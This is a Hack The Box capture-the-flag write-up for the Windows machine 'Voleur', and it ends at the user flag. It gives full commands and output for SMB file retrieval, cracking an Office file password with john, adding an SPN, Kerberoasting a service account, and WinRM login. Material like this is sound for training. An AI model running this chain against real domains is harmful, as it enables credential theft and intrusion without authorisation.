Skip to content

Voleur - Hack The Box

Platform: Windows

IP: 10.129.29.242

Difficulty: Medium

Author: NoSec

wanna go deeper? unlock short videos & early root chains by joining backdoor crew

πŸ’€ join the backdoor crew

Recon

nmap -sV -sC -Pn 10.129.29.242

Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-06 10:16 CEST
Nmap scan report for 10.129.29.242
Host is up (0.063s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-07-06 16:16:18Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
2222/tcp open  ssh           OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: voleur.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)

We receive a default username/password for the machine:

ryan.naylor / HollowOct31Nyt

Edit the hosts file:

sudo nano /etc/hosts
10.129.29.242       voleur.htb dc.voleur.htb

Time synchronization is important:

sudo rdate -n RUSTYKEY.HTB

Kerberos

Set krb5.conf:

[libdefaults]
    default_realm = VOLEUR.HTB
    dns_lookup_realm = false
    dns_lookup_kdc = false

[realms]
    VOLEUR.HTB = {
        kdc = 10.129.29.242
        admin_server = 10.129.29.242
    }

[domain_realm]
    .voleur.htb = VOLEUR.HTB
    voleur.htb = VOLEUR.HTB

Obtain Kerberos ticket (TGT):

kinit ryan.naylor@VOLEUR.HTB

Kerberos SMB connection with Impacket:

export KRB5CCNAME=ryan.ccache
smbclient.py -k -no-pass -dc-ip 10.129.180.134 VOLEUR.HTB/ryan.naylor@dc.voleur.htb

Download the file Access_Review.xlsx:

get Acces_Review.xlsx

Crack the file (office2john + john):

office2john Access_Review.xlsx > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Cracked password:

fo<passw>

Decode the content:

pip install msoffcrypto-tool
msoffcrypto-tool Access_Review.xlsx decrypted.xlsx -p fo<pass>
xlsx2csv decrypted.xlsx access.csv
cat access.csv

File Contents

User,Job Title,Permissions,Notes
Ryan.Naylor,First-Line Support Technician,SMB,Has Kerberos Pre-Auth disabled temporarily to test legacy systems.
Marie.Bryant,First-Line Support Technician,SMB,
Lacey.Miller,Second-Line Support Technician,Remote Management Users,
Todd.Wolfe,Second-Line Support Technician,Remote Management Users,Leaver. Password was reset and account deleted.
Jeremy.Combs,Third-Line Support Technician,Remote Management Users.,Has access to Software folder.
Administrator,Administrator,Domain Admin,Not to be used for daily tasks!


Service Accounts,,,
svc_backup, ,Windows Backup,Speak to Jeremy!
svc_ldap,,LDAP Services,P/W - [REDACTED]
svc_iis,,IIS Administration,P/W - [REDACTED]
svc_winrm,,Remote Management ,Need to ask Lacey as she reset this recently.

Create an SPN for the svc_winrm account:

cat > addspn.ldif << 'EOF'
dn: CN=svc_winrm,OU=Service Accounts,DC=voleur,DC=htb
changetype: modify
add: servicePrincipalName
servicePrincipalName: HTTP/voleur.htb
EOF

ldapmodify -x   -H ldap://10.129.29.242   -D "svc_ldap@voleur.htb"   -w "M1<pass>"   -f addspn.ldif

Extract and crack the hash:

python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py   -k -request -request-user svc_winrm   -dc-ip 10.129.29.242   -dc-host dc.voleur.htb   voleur.htb/svc_ldap > tgs_hashes.txt

john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs tgs_hashes.txt

john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5tgs tgs_hashes.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
AFire<pass> (?)     
1g 0:00:00:05 DONE (2025-07-06 21:12) 0.1886g/s 2164Kp/s 2164Kc/s 2164KC/s AHANACK6978012..ADDRESS1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Cracked password:

AFire<pass>

Save TGT and export:

impacket-getTGT 'VOLEUR.HTB/SVC_WINRM:AFire<pass>'
export KRB5CCNAME=SVC_WINRM.ccache

Log in via evil-winrm and grab the user flag:

evil-winrm -i dc.voleur.htb -r VOLEUR.HTB
*Evil-WinRM* PS C:\Users\svc_winrm> cd Desktop
*Evil-WinRM* PS C:\Users\svc_winrm\Desktop> ls


    Directory: C:\Users\svc_winrm\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         1/29/2025   7:07 AM           2312 Microsoft Edge.lnk
-ar---          7/6/2025  10:33 AM             34 user.txt

βœ… User flag acquired!

πŸ” The root section is available only in our private Telegram group as long as the machine is active in Season 8.
πŸ‘‰ Join us for the full writeup, extra tips, and insider content:
πŸ“‘ https://t.me/nosecpwn)

β˜• invite me for a coffee so i don’t fall asleep writing the next writeup

πŸ’» support nosec